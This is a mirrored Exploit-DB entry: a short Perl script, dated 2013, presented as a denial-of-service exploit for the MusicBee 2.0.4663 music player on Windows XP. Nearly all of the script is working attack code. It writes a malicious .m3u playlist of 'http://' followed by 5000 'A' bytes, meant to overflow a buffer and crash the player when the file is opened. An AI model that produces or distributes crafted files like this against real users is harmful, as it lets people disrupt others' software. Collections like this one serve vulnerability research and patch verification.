exploit-db-mirror/exploits/windows/dos/26322.pl
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

21 lines
No EOL
518 B
Perl
Executable file

#!/usr/bin/perl
#
#
#
#############################################################
#
# Exploit Title: MusicBee v2.0.4663 .M3U Denial of Service Exploit
# Date: 2013/6/19
# Exploit Author: Chako
# Vendor Homepage: http://getmusicbee.com/
# Version: v2.0.4663
# Tested on: Windows XP SP3 English
#############################################################
$HEADER = "http://";
#$BOF = "\x41" x 3740;
$BOF = "\x41" x 5000;
open(myfile, '> MusicBee _EXP.m3u');
print myfile $HEADER.$BOF;